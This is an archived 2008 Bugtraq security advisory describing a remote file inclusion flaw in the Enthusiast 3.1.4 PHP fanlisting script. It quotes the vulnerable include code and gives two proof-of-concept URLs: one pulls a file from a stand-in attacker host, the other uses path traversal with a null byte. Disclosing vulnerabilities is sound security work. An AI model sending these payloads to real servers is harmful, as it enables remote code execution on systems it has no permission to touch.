lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20081108100225.daw3izgzg0skck0g@mail.amnpardaz.com>
Date: Sat, 08 Nov 2008 10:02:25 +0330
From: admin@...report.ir
To: bugtraq@...urityfocus.com
Subject: Enthusiast 3 Remote Code Execution

########################## www.BugReport.ir #########################
#
#      AmnPardaz Security Research Team
#
# Title: Enthusiast 3 Remote Code Execution
# Vendor: http://scripts.indisguise.org/enthusiast/
# Bug: File Inclusion
# Vulnerable Version: 3.1.4 (prior versions also may be affected)
# Exploitation: Remote with browser
# Fix: N/A
# Original Advisory: http://www.bugreport.ir/index_57.htm
###################################################################


####################
- Description:
####################

Enthusiast is a full-featured member listing collective management  
script. It is geared towards fanlisting owners who own multiple  
fanlistings, but easily

customizable for other types of listings as well?cliques, physical  
listings, taboo listings, and the like.


####################
- Vulnerability:
####################

+--> File Inclusion

When register_globals is enabled, Its possible to include arbitrary  
files from local or remote resources.

####################
- Code Snippet:
####################
/show_joined.php #line:261-264

<p class="show_joined_credits">
<a href="http://scripts.indisguise.org">Powered by Enthusiast
<?php include $path . 'show_enthversion.php' ?></a>
</p>

####################
- Exploits/POCs:
####################

POC:  
http://example.com/enth_3.1.4/enth3/show_joined.php?path=http://evilsite/  
(this one includes show_enthversion.php from evilsite)
POC:  
http://example.com/enth_3.1.4/enth3/show_joined.php?path=../../evilscript.php%00 (this requiers magic_quotes_gpc to be  
disabled)

####################
- Credit :
####################
AmnPardaz Security Research Team
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.comz


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ